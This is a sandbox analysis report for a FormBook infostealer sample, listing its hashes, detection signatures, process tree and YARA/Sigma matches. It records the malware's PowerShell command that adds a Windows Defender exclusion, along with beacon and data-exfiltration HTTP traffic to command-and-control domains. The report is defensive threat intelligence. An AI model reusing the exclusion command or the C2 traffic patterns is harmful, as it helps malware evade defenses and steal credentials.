Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NU1aAbSmCr.exe

Overview

General Information

Sample name:NU1aAbSmCr.exe
renamed because original name is a hash value
Original sample name:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830.exe
Analysis ID:1529867
MD5:519b9a9e52aa6e23736f01afa4001654
SHA1:dd28761acf65483cf2de998e93b9490afb27f196
SHA256:ee229e0094d512a8a9e8210e75ca4319384360113b541aa7a10ed301e0425830
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • NU1aAbSmCr.exe (PID: 4220 cmdline: "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: 519B9A9E52AA6E23736F01AFA4001654)
    • powershell.exe (PID: 5268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7304 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • NU1aAbSmCr.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\NU1aAbSmCr.exe" MD5: 519B9A9E52AA6E23736F01AFA4001654)
      • mCFHCvdrqdDiDT.exe (PID: 6888 cmdline: "C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • NETSTAT.EXE (PID: 7788 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • mCFHCvdrqdDiDT.exe (PID: 6280 cmdline: "C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1433f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x49df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x31f02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.NU1aAbSmCr.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.NU1aAbSmCr.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f6a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x177b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.NU1aAbSmCr.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.NU1aAbSmCr.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e8a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x169b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NU1aAbSmCr.exe", ParentImage: C:\Users\user\Desktop\NU1aAbSmCr.exe, ParentProcessId: 4220, ParentProcessName: NU1aAbSmCr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe", ProcessId: 5268, ProcessName: powershell.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: NU1aAbSmCr.exeReversingLabs: Detection: 65%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: NU1aAbSmCr.exeJoe Sandbox ML: detected
            Source: NU1aAbSmCr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: NU1aAbSmCr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: tTOn.pdbSHA256 source: NU1aAbSmCr.exe
            Source: Binary string: netstat.pdbGCTL source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netstat.pdb source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2578656019.000000000005E000.00000002.00000001.01000000.0000000C.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1887553135.000000000005E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NU1aAbSmCr.exe, NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tTOn.pdb source: NU1aAbSmCr.exe
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0305C780 FindFirstFileW,FindNextFileW,FindClose,11_2_0305C780
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then xor eax, eax11_2_03049B80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then mov ebx, 00000004h11_2_037104E8

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002304.xyz
            Source: DNS query: www.tophm.xyz
            Uses netstat to query active network connections and open ports
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewIP Address: 199.192.21.169 199.192.21.169
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /koup/?wZBh=UzoT8ph&8T2hn=zjgQ1IglZSD3j4X7Mb/L9VMKC/lioNLyTiYpIFDypb2XxqZYhzfHyCasu3J1FKt+ikpO665Ej+Wn9KB3IEhbZRsyBSNLju/tAMuqMeNka3iE/L9xhA== HTTP/1.1Host: www.kovallo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph HTTP/1.1Host: www.030002304.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA== HTTP/1.1Host: www.newdaydawning.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph HTTP/1.1Host: www.coffee-and-blends.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /30rz/?wZBh=UzoT8ph&8T2hn=wd7m4mq4h41P+rN28pyT+ttY7GHVuAvuqtpnERraqOjaWWvMpBvRQDu/0Ra1ptpTEf0KGGfWsjsqje2uOEmu4OBI5eYxRB5JEme+Ix16OOjxqM3SMw== HTTP/1.1Host: www.tophm.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.kovallo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.030002304.xyz
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.coffee-and-blends.info
            Source: global trafficDNS traffic detected: DNS query: www.tophm.xyz
            Source: unknownHTTP traffic detected: POST /6uay/ HTTP/1.1Host: www.030002304.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.030002304.xyzContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 194Cache-Control: no-cacheReferer: http://www.030002304.xyz/6uay/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 39 74 2f 5a 35 4e 53 49 47 49 53 55 66 41 51 52 51 51 46 69 69 30 4f 77 44 78 65 4b 44 75 49 36 7a 37 33 4b 4e 6c 49 59 49 63 45 37 36 77 46 4e 51 41 62 5a 36 4e 64 46 67 38 5a 77 58 63 62 2b 37 7a 47 6e 51 62 33 70 6f 32 2b 51 53 61 56 4c 54 44 33 42 5a 30 6f 4f 76 64 6f 42 77 74 33 67 4a 41 73 58 63 31 2b 61 37 4d 76 59 6b 52 7a 67 32 48 6a 6e 67 37 56 37 48 2f 41 44 73 33 50 77 46 31 64 37 48 62 78 39 53 4a 37 51 6d 4e 72 4c 47 49 37 32 6e 62 34 79 4f 58 50 2f 65 59 6e 41 4a 67 53 68 70 68 77 41 48 6e 39 34 4a 2b 31 63 Data Ascii: 8T2hn=1veu06OtMkxu9t/Z5NSIGISUfAQRQQFii0OwDxeKDuI6z73KNlIYIcE76wFNQAbZ6NdFg8ZwXcb+7zGnQb3po2+QSaVLTD3BZ0oOvdoBwt3gJAsXc1+a7MvYkRzg2Hjng7V7H/ADs3PwF1d7Hbx9SJ7QmNrLGI72nb4yOXP/eYnAJgShphwAHn94J+1c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:02:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 12:02:16 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
